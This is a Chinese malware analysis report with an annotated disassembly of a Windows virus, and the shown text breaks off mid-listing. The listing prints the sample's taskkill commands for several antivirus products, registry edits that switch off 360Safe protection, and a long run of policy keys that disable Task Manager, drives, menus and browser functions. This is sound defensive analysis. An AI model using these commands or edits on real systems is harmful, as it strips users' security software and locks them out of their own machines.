一个简单的病毒分析
基本信息:
报告名称:对一恶意程序的分析
作者:Thend
报告更新时间:2012.09.17
样本发现时间:未知
样本类型:恶性病毒
样本文件MD5校验:654C2392FFD3D4A6843CF86100940779
壳信息:无壳
语言:易语言
可能受到威胁的系统:windows
相关漏洞:无
简介:
病毒一开始反复弹出一个恶搞弹窗。然后去找市面上大部分杀软的进程,并杀掉。然后进行一系列的注册表操作,禁用和隐藏了计算机大部分功能,使得计算机无法工作。
被感染系统的症状:
隐藏:所有的文件和文件夹,开始菜单中的”运行“、“关机”、“注销”、“搜索”、“登陆”,磁盘驱动器,驱动器,文件夹选项,IE主页选项组,IE文件菜单,IE收藏夹栏,internet选项。
禁用:控制面板,任务管理器,驱动器,打印,IE查看源文件,IE下载功能,右键关联,重启切换到DOS环境,文档菜单,鼠标右键。
关闭所有杀软。所有应用程序图标更改。修改.txt、.inf、.reg、.exe文件的关联。
文件系统变化:
在C:\Windows\system32目录下生成了:43.vbs、24.bat、59.bat、6.vbs。执行完之后删除。
注册表变化:
见代码分析~
对本体的分析:
1 0040C155 55 push ebp ;入口 2 0040C156 8BEC mov ebp,esp 3 0040C158 81EC 1C000000 sub esp,0x1C 4 0040C15E 68 04000080 push 0x80000004 5 0040C163 6A 00 push 0x0 6 0040C165 68 CB904000 push 样本.004090CB 7 0040C16A 68 01000000 push 0x1 8 0040C16F BB 60010000 mov ebx,0x160 9 0040C174 E8 AF230000 call 样本.0040E528 ; 弹出一个弹窗 10 0040C179 83C4 10 add esp,0x10 11 0040C17C 68 03000080 push 0x80000003 12 0040C181 52 push edx 13 0040C182 50 push eax 14 0040C183 68 01000000 push 0x1 15 0040C188 BB 14020000 mov ebx,0x214 16 0040C18D E8 96230000 call 样本.0040E528 ; 弹出一个弹窗 17 0040C192 83C4 10 add esp,0x10 18 0040C195 6A 00 push 0x0 19 0040C197 6A 00 push 0x0 20 0040C199 6A 00 push 0x0 21 0040C19B 68 01030080 push 0x80000301 22 0040C1A0 6A 00 push 0x0 23 0040C1A2 68 14000000 push 0x14 24 0040C1A7 68 04000080 push 0x80000004 25 0040C1AC 6A 00 push 0x0 26 0040C1AE 68 DA904000 push 样本.004090DA 27 0040C1B3 68 03000000 push 0x3 28 0040C1B8 BB 00030000 mov ebx,0x300 29 0040C1BD E8 66230000 call 样本.0040E528 ; 弹出一个弹窗 30 0040C1C2 83C4 28 add esp,0x28 31 0040C1C5 6A 00 push 0x0 32 0040C1C7 6A 00 push 0x0 33 0040C1C9 6A 00 push 0x0 34 0040C1CB 68 01030080 push 0x80000301 35 0040C1D0 6A 00 push 0x0 36 0040C1D2 68 14000000 push 0x14 37 0040C1D7 68 04000080 push 0x80000004 38 0040C1DC 6A 00 push 0x0 39 0040C1DE 68 DA904000 push 样本.004090DA 40 0040C1E3 68 03000000 push 0x3 41 0040C1E8 BB 00030000 mov ebx,0x300 42 0040C1ED E8 36230000 call 样本.0040E528 ; 弹出一个弹窗 43 0040C1F2 83C4 28 add esp,0x28 44 0040C1F5 6A 00 push 0x0 45 0040C1F7 6A 00 push 0x0 46 0040C1F9 6A 00 push 0x0 47 0040C1FB 68 01030080 push 0x80000301 48 0040C200 6A 00 push 0x0 49 0040C202 68 14000000 push 0x14 50 0040C207 68 04000080 push 0x80000004 51 0040C20C 6A 00 push 0x0 52 0040C20E 68 DA904000 push 样本.004090DA 53 0040C213 68 03000000 push 0x3 54 0040C218 BB 00030000 mov ebx,0x300 55 0040C21D E8 06230000 call 样本.0040E528 ; 弹出一个弹窗 56 0040C222 83C4 28 add esp,0x28 57 0040C225 6A 00 push 0x0 58 0040C227 6A 00 push 0x0 59 0040C229 6A 00 push 0x0 60 0040C22B 68 01030080 push 0x80000301 61 0040C230 6A 00 push 0x0 62 0040C232 68 14000000 push 0x14 63 0040C237 68 04000080 push 0x80000004 64 0040C23C 6A 00 push 0x0 65 0040C23E 68 DA904000 push 样本.004090DA 66 0040C243 68 03000000 push 0x3 67 0040C248 BB 00030000 mov ebx,0x300 68 0040C24D E8 D6220000 call 样本.0040E528 ; 弹出一个弹窗 69 0040C252 83C4 28 add esp,0x28 70 0040C255 68 01030080 push 0x80000301 71 0040C25A 6A 00 push 0x0 72 0040C25C 68 01000000 push 0x1 73 0040C261 68 02000080 push 0x80000002 74 0040C266 6A 00 push 0x0 75 0040C268 68 00000000 push 0x0 76 0040C26D 68 04000080 push 0x80000004 77 0040C272 6A 00 push 0x0 78 0040C274 68 F1904000 push 样本.004090F1 ; ASCII "taskkill /f /im kavsvc.exe" 79 0040C279 68 03000000 push 0x3 80 0040C27E BB C0020000 mov ebx,0x2C0 81 0040C283 E8 A0220000 call 样本.0040E528 ; 关闭卡巴 82 0040C288 83C4 28 add esp,0x28 83 0040C28B 68 01030080 push 0x80000301 84 0040C290 6A 00 push 0x0 85 0040C292 68 01000000 push 0x1 86 0040C297 68 02000080 push 0x80000002 87 0040C29C 6A 00 push 0x0 88 0040C29E 68 00000000 push 0x0 89 0040C2A3 68 04000080 push 0x80000004 90 0040C2A8 6A 00 push 0x0 91 0040C2AA 68 0C914000 push 样本.0040910C ; ASCII "taskkill /f /im KVXP.kxp" 92 0040C2AF 68 03000000 push 0x3 93 0040C2B4 BB C0020000 mov ebx,0x2C0 94 0040C2B9 E8 6A220000 call 样本.0040E528 ; 关闭江民 95 0040C2BE 83C4 28 add esp,0x28 96 0040C2C1 68 01030080 push 0x80000301 97 0040C2C6 6A 00 push 0x0 98 0040C2C8 68 01000000 push 0x1 99 0040C2CD 68 02000080 push 0x80000002 100 0040C2D2 6A 00 push 0x0 101 0040C2D4 68 00000000 push 0x0 102 0040C2D9 68 04000080 push 0x80000004 103 0040C2DE 6A 00 push 0x0 104 0040C2E0 68 25914000 push 样本.00409125 ; ASCII "taskkill /f /im Rav.exe" 105 0040C2E5 68 03000000 push 0x3 106 0040C2EA BB C0020000 mov ebx,0x2C0 107 0040C2EF E8 34220000 call 样本.0040E528 ; 关闭瑞星相关进程 108 0040C2F4 83C4 28 add esp,0x28 109 0040C2F7 68 01030080 push 0x80000301 110 0040C2FC 6A 00 push 0x0 111 0040C2FE 68 01000000 push 0x1 112 0040C303 68 02000080 push 0x80000002 113 0040C308 6A 00 push 0x0 114 0040C30A 68 00000000 push 0x0 115 0040C30F 68 04000080 push 0x80000004 116 0040C314 6A 00 push 0x0 117 0040C316 68 3D914000 push 样本.0040913D ; ASCII "taskkill /f /im Ravmon.exe" 118 0040C31B 68 03000000 push 0x3 119 0040C320 BB C0020000 mov ebx,0x2C0 120 0040C325 E8 FE210000 call 样本.0040E528 ; 关闭瑞星相关进程 121 0040C32A 83C4 28 add esp,0x28 122 0040C32D 68 01030080 push 0x80000301 123 0040C332 6A 00 push 0x0 124 0040C334 68 01000000 push 0x1 125 0040C339 68 02000080 push 0x80000002 126 0040C33E 6A 00 push 0x0 127 0040C340 68 00000000 push 0x0 128 0040C345 68 04000080 push 0x80000004 129 0040C34A 6A 00 push 0x0 130 0040C34C 68 58914000 push 样本.00409158 ; ASCII "taskkill /f /im Mcshield.exe" 131 0040C351 68 03000000 push 0x3 132 0040C356 BB C0020000 mov ebx,0x2C0 133 0040C35B E8 C8210000 call 样本.0040E528 ; 关闭McAfee VirusScan核心进程 134 0040C360 83C4 28 add esp,0x28 135 0040C363 68 01030080 push 0x80000301 136 0040C368 6A 00 push 0x0 137 0040C36A 68 01000000 push 0x1 138 0040C36F 68 02000080 push 0x80000002 139 0040C374 6A 00 push 0x0 140 0040C376 68 00000000 push 0x0 141 0040C37B 68 04000080 push 0x80000004 142 0040C380 6A 00 push 0x0 143 0040C382 68 75914000 push 样本.00409175 ; ASCII "taskkill /f /im VsTskMgr.exe" 144 0040C387 68 03000000 push 0x3 145 0040C38C BB C0020000 mov ebx,0x2C0 146 0040C391 E8 92210000 call 样本.0040E528 ; 关闭McAfee Internet Security网络安全套装的一部分 147 0040C396 83C4 28 add esp,0x28 148 0040C399 68 01030080 push 0x80000301 149 0040C39E 6A 00 push 0x0 150 0040C3A0 68 00000000 push 0x0 151 0040C3A5 68 04000080 push 0x80000004 152 0040C3AA 6A 00 push 0x0 153 0040C3AC 68 92914000 push 样本.00409192 ; ASCII "SOFTWARE\360Safe\safemon\ExecAccess" 154 0040C3B1 68 01030080 push 0x80000301 155 0040C3B6 6A 00 push 0x0 156 0040C3B8 68 04000000 push 0x4 157 0040C3BD 68 03000000 push 0x3 158 0040C3C2 BB A4060000 mov ebx,0x6A4 159 0040C3C7 E8 5C210000 call 样本.0040E528 ; 设置ExecAccess的键值为 0 160 0040C3CC 83C4 28 add esp,0x28 161 0040C3CF 68 01030080 push 0x80000301 162 0040C3D4 6A 00 push 0x0 163 0040C3D6 68 00000000 push 0x0 164 0040C3DB 68 04000080 push 0x80000004 165 0040C3E0 6A 00 push 0x0 166 0040C3E2 68 B6914000 push 样本.004091B6 ; ASCII "SOFTWARE\360Safe\safemon\MonAccess" 167 0040C3E7 68 01030080 push 0x80000301 168 0040C3EC 6A 00 push 0x0 169 0040C3EE 68 04000000 push 0x4 170 0040C3F3 68 03000000 push 0x3 171 0040C3F8 BB A4060000 mov ebx,0x6A4 172 0040C3FD E8 26210000 call 样本.0040E528 ; 设置MonAccess的键值为0 173 0040C402 83C4 28 add esp,0x28 174 0040C405 68 01030080 push 0x80000301 175 0040C40A 6A 00 push 0x0 176 0040C40C 68 00000000 push 0x0 177 0040C411 68 04000080 push 0x80000004 178 0040C416 6A 00 push 0x0 179 0040C418 68 D9914000 push 样本.004091D9 ; ASCII "SOFTWARE\360Safe\safemon\SiteAccess" 180 0040C41D 68 01030080 push 0x80000301 181 0040C422 6A 00 push 0x0 182 0040C424 68 04000000 push 0x4 183 0040C429 68 03000000 push 0x3 184 0040C42E BB A4060000 mov ebx,0x6A4 185 0040C433 E8 F0200000 call 样本.0040E528 ; 设置SiteAccess的键值为0 186 0040C438 83C4 28 add esp,0x28 187 0040C43B 68 01030080 push 0x80000301 188 0040C440 6A 00 push 0x0 189 0040C442 68 00000000 push 0x0 190 0040C447 68 04000080 push 0x80000004 191 0040C44C 6A 00 push 0x0 192 0040C44E 68 FD914000 push 样本.004091FD ; ASCII "SOFTWARE\360Safe\safemon\UDiskAccess" 193 0040C453 68 01030080 push 0x80000301 194 0040C458 6A 00 push 0x0 195 0040C45A 68 04000000 push 0x4 196 0040C45F 68 03000000 push 0x3 197 0040C464 BB A4060000 mov ebx,0x6A4 198 0040C469 E8 BA200000 call 样本.0040E528 ; 设置UDiskAccess的键值为0 199 0040C46E 83C4 28 add esp,0x28 200 0040C471 68 01030080 push 0x80000301 201 0040C476 6A 00 push 0x0 202 0040C478 68 01000000 push 0x1 203 0040C47D 68 02000080 push 0x80000002 204 0040C482 6A 00 push 0x0 205 0040C484 68 00000000 push 0x0 206 0040C489 68 04000080 push 0x80000004 207 0040C48E 6A 00 push 0x0 208 0040C490 68 22924000 push 样本.00409222 ; ASCII "taskkill /f /im 360tray.exe" 209 0040C495 68 03000000 push 0x3 210 0040C49A BB C0020000 mov ebx,0x2C0 211 0040C49F E8 84200000 call 样本.0040E528 ; 杀掉360实时监控进程 212 0040C4A4 83C4 28 add esp,0x28 213 0040C4A7 68 04000080 push 0x80000004 214 0040C4AC 6A 00 push 0x0 215 0040C4AE 68 3E924000 push 样本.0040923E ; ASCII "jpegfile" 216 0040C4B3 68 04000080 push 0x80000004 217 0040C4B8 6A 00 push 0x0 218 0040C4BA 68 47924000 push 样本.00409247 ; ASCII ".txt\" 219 0040C4BF 68 01030080 push 0x80000301 220 0040C4C4 6A 00 push 0x0 221 0040C4C6 68 01000000 push 0x1 222 0040C4CB 68 03000000 push 0x3 223 0040C4D0 BB A4060000 mov ebx,0x6A4 224 0040C4D5 E8 4E200000 call 样本.0040E528 ; 修改.txt文件关联 225 0040C4DA 83C4 28 add esp,0x28 226 0040C4DD 68 04000080 push 0x80000004 227 0040C4E2 6A 00 push 0x0 228 0040C4E4 68 3E924000 push 样本.0040923E ; ASCII "jpegfile" 229 0040C4E9 68 04000080 push 0x80000004 230 0040C4EE 6A 00 push 0x0 231 0040C4F0 68 4D924000 push 样本.0040924D ; ASCII ".inf\" 232 0040C4F5 68 01030080 push 0x80000301 233 0040C4FA 6A 00 push 0x0 234 0040C4FC 68 01000000 push 0x1 235 0040C501 68 03000000 push 0x3 236 0040C506 BB A4060000 mov ebx,0x6A4 237 0040C50B E8 18200000 call 样本.0040E528 ; 修改.inf文件关联 238 0040C510 83C4 28 add esp,0x28 239 0040C513 68 01030080 push 0x80000301 240 0040C518 6A 00 push 0x0 241 0040C51A 68 00000000 push 0x0 242 0040C51F 68 04000080 push 0x80000004 243 0040C524 6A 00 push 0x0 244 0040C526 68 53924000 push 样本.00409253 ; ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue" 245 0040C52B 68 01030080 push 0x80000301 246 0040C530 6A 00 push 0x0 247 0040C532 68 04000000 push 0x4 248 0040C537 68 03000000 push 0x3 249 0040C53C BB A4060000 mov ebx,0x6A4 250 0040C541 E8 E21F0000 call 样本.0040E528 ; 将CheckedValue的键值设置成0. 使系统无法显示隐藏文件 251 0040C546 83C4 28 add esp,0x28 252 0040C549 68 01030080 push 0x80000301 253 0040C54E 6A 00 push 0x0 254 0040C550 68 00000000 push 0x0 255 0040C555 68 04000080 push 0x80000004 256 0040C55A 6A 00 push 0x0 257 0040C55C 68 B2924000 push 样本.004092B2 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr" 258 0040C561 68 01030080 push 0x80000301 259 0040C566 6A 00 push 0x0 260 0040C568 68 03000000 push 0x3 261 0040C56D 68 03000000 push 0x3 262 0040C572 BB A4060000 mov ebx,0x6A4 263 0040C577 E8 AC1F0000 call 样本.0040E528 ; 禁用任务管理器 264 0040C57C 83C4 28 add esp,0x28 265 0040C57F 68 01030080 push 0x80000301 266 0040C584 6A 00 push 0x0 267 0040C586 68 01000000 push 0x1 268 0040C58B 68 04000080 push 0x80000004 269 0040C590 6A 00 push 0x0 270 0040C592 68 FB924000 push 样本.004092FB ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel" 271 0040C597 68 01030080 push 0x80000301 272 0040C59C 6A 00 push 0x0 273 0040C59E 68 03000000 push 0x3 274 0040C5A3 68 03000000 push 0x3 275 0040C5A8 BB A4060000 mov ebx,0x6A4 276 0040C5AD E8 761F0000 call 样本.0040E528 ; 禁用控制面板 277 0040C5B2 83C4 28 add esp,0x28 278 0040C5B5 68 01030080 push 0x80000301 279 0040C5BA 6A 00 push 0x0 280 0040C5BC 68 01000000 push 0x1 281 0040C5C1 68 04000080 push 0x80000004 282 0040C5C6 6A 00 push 0x0 283 0040C5C8 68 46934000 push 样本.00409346 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools" 284 0040C5CD 68 01030080 push 0x80000301 285 0040C5D2 6A 00 push 0x0 286 0040C5D4 68 03000000 push 0x3 287 0040C5D9 68 03000000 push 0x3 288 0040C5DE BB A4060000 mov ebx,0x6A4 289 0040C5E3 E8 401F0000 call 样本.0040E528 ; 隐藏开始菜单中的运行,禁止通过任务管理器创建新任务 290 0040C5E8 83C4 28 add esp,0x28 291 0040C5EB 68 01030080 push 0x80000301 292 0040C5F0 6A 00 push 0x0 293 0040C5F2 68 01000000 push 0x1 294 0040C5F7 68 04000080 push 0x80000004 295 0040C5FC 6A 00 push 0x0 296 0040C5FE 68 95934000 push 样本.00409395 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun" 297 0040C603 68 01030080 push 0x80000301 298 0040C608 6A 00 push 0x0 299 0040C60A 68 03000000 push 0x3 300 0040C60F 68 03000000 push 0x3 301 0040C614 BB A4060000 mov ebx,0x6A4 302 0040C619 E8 0A1F0000 call 样本.0040E528 ; 隐藏“MS-DOS”下的磁盘驱动器。 303 0040C61E 83C4 28 add esp,0x28 304 0040C621 68 01030080 push 0x80000301 305 0040C626 6A 00 push 0x0 306 0040C628 68 01000000 push 0x1 307 0040C62D 68 04000080 push 0x80000004 308 0040C632 6A 00 push 0x0 309 0040C634 68 D7934000 push 样本.004093D7 ; ASCII "SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled" 310 0040C639 68 01030080 push 0x80000301 311 0040C63E 6A 00 push 0x0 312 0040C640 68 03000000 push 0x3 313 0040C645 68 03000000 push 0x3 314 0040C64A BB A4060000 mov ebx,0x6A4 315 0040C64F E8 D41E0000 call 样本.0040E528 ; 隐藏开始中的关机 316 0040C654 83C4 28 add esp,0x28 317 0040C657 68 01060080 push 0x80000601 318 0040C65C 68 FFFFEF41 push 0x41EFFFFF 319 0040C661 68 0000E0FF push 0xFFE00000 320 0040C666 68 04000080 push 0x80000004 321 0040C66B 6A 00 push 0x0 322 0040C66D 68 21944000 push 样本.00409421 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives" 323 0040C672 68 01030080 push 0x80000301 324 0040C677 6A 00 push 0x0 325 0040C679 68 03000000 push 0x3 326 0040C67E 68 03000000 push 0x3 327 0040C683 BB A4060000 mov ebx,0x6A4 328 0040C688 E8 9B1E0000 call 样本.0040E528 ; 隐藏所有驱动器 329 0040C68D 83C4 28 add esp,0x28 330 0040C690 68 01060080 push 0x80000601 331 0040C695 68 FFFFEF41 push 0x41EFFFFF 332 0040C69A 68 0000E0FF push 0xFFE00000 333 0040C69F 68 04000080 push 0x80000004 334 0040C6A4 6A 00 push 0x0 335 0040C6A6 68 66944000 push 样本.00409466 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive" 336 0040C6AB 68 01030080 push 0x80000301 337 0040C6B0 6A 00 push 0x0 338 0040C6B2 68 03000000 push 0x3 339 0040C6B7 68 03000000 push 0x3 340 0040C6BC BB A4060000 mov ebx,0x6A4 341 0040C6C1 E8 621E0000 call 样本.0040E528 ; 禁止所有驱动器 342 0040C6C6 83C4 28 add esp,0x28 343 0040C6C9 68 01030080 push 0x80000301 344 0040C6CE 6A 00 push 0x0 345 0040C6D0 68 01000000 push 0x1 346 0040C6D5 68 04000080 push 0x80000004 347 0040C6DA 6A 00 push 0x0 348 0040C6DC 68 B0944000 push 样本.004094B0 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions" 349 0040C6E1 68 01030080 push 0x80000301 350 0040C6E6 6A 00 push 0x0 351 0040C6E8 68 03000000 push 0x3 352 0040C6ED 68 03000000 push 0x3 353 0040C6F2 BB A4060000 mov ebx,0x6A4 354 0040C6F7 E8 2C1E0000 call 样本.0040E528 ; 隐藏文件夹选项 355 0040C6FC 83C4 28 add esp,0x28 356 0040C6FF 68 01030080 push 0x80000301 357 0040C704 6A 00 push 0x0 358 0040C706 68 01000000 push 0x1 359 0040C70B 68 04000080 push 0x80000004 360 0040C710 6A 00 push 0x0 361 0040C712 68 FC944000 push 样本.004094FC ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop" 362 0040C717 68 01030080 push 0x80000301 363 0040C71C 6A 00 push 0x0 364 0040C71E 68 03000000 push 0x3 365 0040C723 68 03000000 push 0x3 366 0040C728 BB A4060000 mov ebx,0x6A4 367 0040C72D E8 F61D0000 call 样本.0040E528 ; 隐藏桌面对象 368 0040C732 83C4 28 add esp,0x28 369 0040C735 68 01030080 push 0x80000301 370 0040C73A 6A 00 push 0x0 371 0040C73C 68 01000000 push 0x1 372 0040C741 68 04000080 push 0x80000004 373 0040C746 6A 00 push 0x0 374 0040C748 68 42954000 push 样本.00409542 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose" 375 0040C74D 68 01030080 push 0x80000301 376 0040C752 6A 00 push 0x0 377 0040C754 68 03000000 push 0x3 378 0040C759 68 03000000 push 0x3 379 0040C75E BB A4060000 mov ebx,0x6A4 380 0040C763 E8 C01D0000 call 样本.0040E528 ; 隐藏开始中的关机 381 0040C768 83C4 28 add esp,0x28 382 0040C76B 68 01030080 push 0x80000301 383 0040C770 6A 00 push 0x0 384 0040C772 68 01000000 push 0x1 385 0040C777 68 04000080 push 0x80000004 386 0040C77C 6A 00 push 0x0 387 0040C77E 68 86954000 push 样本.00409586 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind" 388 0040C783 68 01030080 push 0x80000301 389 0040C788 6A 00 push 0x0 390 0040C78A 68 03000000 push 0x3 391 0040C78F 68 03000000 push 0x3 392 0040C794 BB A4060000 mov ebx,0x6A4 393 0040C799 E8 8A1D0000 call 样本.0040E528 ; 隐藏开始中的搜索 394 0040C79E 83C4 28 add esp,0x28 395 0040C7A1 68 01030080 push 0x80000301 396 0040C7A6 6A 00 push 0x0 397 0040C7A8 68 01000000 push 0x1 398 0040C7AD 68 04000080 push 0x80000004 399 0040C7B2 6A 00 push 0x0 400 0040C7B4 68 C9954000 push 样本.004095C9 ; ASCII "Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage" 401 0040C7B9 68 01030080 push 0x80000301 402 0040C7BE 6A 00 push 0x0 403 0040C7C0 68 03000000 push 0x3 404 0040C7C5 68 03000000 push 0x3 405 0040C7CA BB A4060000 mov ebx,0x6A4 406 0040C7CF E8 541D0000 call 样本.0040E528 ; 隐藏IE主页选项 407 0040C7D4 83C4 28 add esp,0x28 408 0040C7D7 68 01030080 push 0x80000301 409 0040C7DC 6A 00 push 0x0 410 0040C7DE 68 01000000 push 0x1 411 0040C7E3 68 04000080 push 0x80000004 412 0040C7E8 6A 00 push 0x0 413 0040C7EA 68 0E964000 push 样本.0040960E ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu" 414 0040C7EF 68 01030080 push 0x80000301 415 0040C7F4 6A 00 push 0x0 416 0040C7F6 68 03000000 push 0x3 417 0040C7FB 68 03000000 push 0x3 418 0040C800 BB A4060000 mov ebx,0x6A4 419 0040C805 E8 1E1D0000 call 样本.0040E528 ; 隐藏IE文件菜单 420 0040C80A 83C4 28 add esp,0x28 421 0040C80D 68 01030080 push 0x80000301 422 0040C812 6A 00 push 0x0 423 0040C814 68 01000000 push 0x1 424 0040C819 68 04000080 push 0x80000004 425 0040C81E 6A 00 push 0x0 426 0040C820 68 55964000 push 样本.00409655 ; ASCII "Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFavorites" 427 0040C825 68 01030080 push 0x80000301 428 0040C82A 6A 00 push 0x0 429 0040C82C 68 03000000 push 0x3 430 0040C831 68 03000000 push 0x3 431 0040C836 BB A4060000 mov ebx,0x6A4 432 0040C83B E8 E81C0000 call 样本.0040E528 ; 隐藏IE收藏文件夹 433 0040C840 83C4 28 add esp,0x28 434 0040C843 68 01030080 push 0x80000301 435 0040C848 6A 00 push 0x0 436 0040C84A 68 01000000 push 0x1 437 0040C84F 68 04000080 push 0x80000004 438 0040C854 6A 00 push 0x0 439 0040C856 68 9C964000 push 样本.0040969C ; ASCII "Software\Policies\Microsoft\Internet Explorer\Restrictions\NoPrinting" 440 0040C85B 68 01030080 push 0x80000301 441 0040C860 6A 00 push 0x0 442 0040C862 68 03000000 push 0x3 443 0040C867 68 03000000 push 0x3 444 0040C86C BB A4060000 mov ebx,0x6A4 445 0040C871 E8 B21C0000 call 样本.0040E528 ; 禁止IE打印功能 446 0040C876 83C4 28 add esp,0x28 447 0040C879 68 01030080 push 0x80000301 448 0040C87E 6A 00 push 0x0 449 0040C880 68 01000000 push 0x1 450 0040C885 68 04000080 push 0x80000004 451 0040C88A 6A 00 push 0x0 452 0040C88C 68 E2964000 push 样本.004096E2 ; ASCII "Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions" 453 0040C891 68 01030080 push 0x80000301 454 0040C896 6A 00 push 0x0 455 0040C898 68 03000000 push 0x3 456 0040C89D 68 03000000 push 0x3 457 0040C8A2 BB A4060000 mov ebx,0x6A4 458 0040C8A7 E8 7C1C0000 call 样本.0040E528 ; 禁止右键关联菜单 459 0040C8AC 83C4 28 add esp,0x28 460 0040C8AF 68 01030080 push 0x80000301 461 0040C8B4 6A 00 push 0x0 462 0040C8B6 68 01000000 push 0x1 463 0040C8BB 68 04000080 push 0x80000004 464 0040C8C0 6A 00 push 0x0 465 0040C8C2 68 2E974000 push 样本.0040972E ; ASCII "Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource" 466 0040C8C7 68 01030080 push 0x80000301 467 0040C8CC 6A 00 push 0x0 468 0040C8CE 68 03000000 push 0x3 469 0040C8D3 68 03000000 push 0x3 470 0040C8D8 BB A4060000 mov ebx,0x6A4 471 0040C8DD E8 461C0000 call 样本.0040E528 ; 禁止IE查看源文件 472 0040C8E2 83C4 28 add esp,0x28 473 0040C8E5 68 01030080 push 0x80000301 474 0040C8EA 6A 00 push 0x0 475 0040C8EC 68 03000000 push 0x3 476 0040C8F1 68 04000080 push 0x80000004 477 0040C8F6 6A 00 push 0x0 478 0040C8F8 68 76974000 push 样本.00409776 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803" 479 0040C8FD 68 01030080 push 0x80000301 480 0040C902 6A 00 push 0x0 481 0040C904 68 03000000 push 0x3 482 0040C909 68 03000000 push 0x3 483 0040C90E BB A4060000 mov ebx,0x6A4 484 0040C913 E8 101C0000 call 样本.0040E528 ; 禁止IE下载功能 485 0040C918 83C4 28 add esp,0x28 486 0040C91B 68 01030080 push 0x80000301 487 0040C920 6A 00 push 0x0 488 0040C922 68 01000000 push 0x1 489 0040C927 68 04000080 push 0x80000004 490 0040C92C 6A 00 push 0x0 491 0040C92E 68 BF974000 push 样本.004097BF ; ASCII "Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu" 492 0040C933 68 01030080 push 0x80000301 493 0040C938 6A 00 push 0x0 494 0040C93A 68 03000000 push 0x3 495 0040C93F 68 03000000 push 0x3 496 0040C944 BB A4060000 mov ebx,0x6A4 497 0040C949 E8 DA1B0000 call 样本.0040E528 ; 禁止右键关联 498 0040C94E 83C4 28 add esp,0x28 499 0040C951 68 01030080 push 0x80000301 500 0040C956 6A 00 push 0x0 501 0040C958 68 01000000 push 0x1 502 0040C95D 68 04000080 push 0x80000004 503 0040C962 6A 00 push 0x0 504 0040C964 68 0F984000 push 样本.0040980F ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode" 505 0040C969 68 01030080 push 0x80000301 506 0040C96E 6A 00 push 0x0 507 0040C970 68 03000000 push 0x3 508 0040C975 68 03000000 push 0x3 509 0040C97A BB A4060000 mov ebx,0x6A4 510 0040C97F E8 A41B0000 call 样本.0040E528 ; 禁止重新启动计算机到MS-DOS环境 511 0040C984 83C4 28 add esp,0x28 512 0040C987 68 01030080 push 0x80000301 513 0040C98C 6A 00 push 0x0 514 0040C98E 68 01000000 push 0x1 515 0040C993 68 04000080 push 0x80000004 516 0040C998 6A 00 push 0x0 517 0040C99A 68 56984000 push 样本.00409856 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff" 518 0040C99F 68 01030080 push 0x80000301 519 0040C9A4 6A 00 push 0x0 520 0040C9A6 68 03000000 push 0x3 521 0040C9AB 68 03000000 push 0x3 522 0040C9B0 BB A4060000 mov ebx,0x6A4 523 0040C9B5 E8 6E1B0000 call 样本.0040E528 ; 隐藏开始菜单中的登录项 524 0040C9BA 83C4 28 add esp,0x28 525 0040C9BD 68 01030080 push 0x80000301 526 0040C9C2 6A 00 push 0x0 527 0040C9C4 68 01000000 push 0x1 528 0040C9C9 68 04000080 push 0x80000004 529 0040C9CE 6A 00 push 0x0 530 0040C9D0 68 9B984000 push 样本.0040989B ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu" 531 0040C9D5 68 01030080 push 0x80000301 532 0040C9DA 6A 00 push 0x0 533 0040C9DC 68 03000000 push 0x3 534 0040C9E1 68 03000000 push 0x3 535 0040C9E6 BB A4060000 mov ebx,0x6A4 536 0040C9EB E8 381B0000 call 样本.0040E528 ; 隐藏开始菜单中的文档菜单 537 0040C9F0 83C4 28 add esp,0x28 538 0040C9F3 68 01030080 push 0x80000301 539 0040C9F8 6A 00 push 0x0 540 0040C9FA 68 01000000 push 0x1 541 0040C9FF 68 04000080 push 0x80000004 542 0040CA04 6A 00 push 0x0 543 0040CA06 68 56984000 push 样本.00409856 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff" 544 0040CA0B 68 01030080 push 0x80000301 545 0040CA10 6A 00 push 0x0 546 0040CA12 68 03000000 push 0x3 547 0040CA17 68 03000000 push 0x3 548 0040CA1C BB A4060000 mov ebx,0x6A4 549 0040CA21 E8 021B0000 call 样本.0040E528 ; 隐藏开始菜单中的登录项 550 0040CA26 83C4 28 add esp,0x28 551 0040CA29 68 01030080 push 0x80000301 552 0040CA2E 6A 00 push 0x0 553 0040CA30 68 01000000 push 0x1 554 0040CA35 68 04000080 push 0x80000004 555 0040CA3A 6A 00 push 0x0 556 0040CA3C 68 E8984000 push 样本.004098E8 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu" 557 0040CA41 68 01030080 push 0x80000301 558 0040CA46 6A 00 push 0x0 559 0040CA48 68 03000000 push 0x3 560 0040CA4D 68 03000000 push 0x3 561 0040CA52 BB A4060000 mov ebx,0x6A4 562 0040CA57 E8 CC1A0000 call 样本.0040E528 ; 禁止使用鼠标右键 563 0040CA5C 83C4 28 add esp,0x28 564 0040CA5F 68 01030080 push 0x80000301 565 0040CA64 6A 00 push 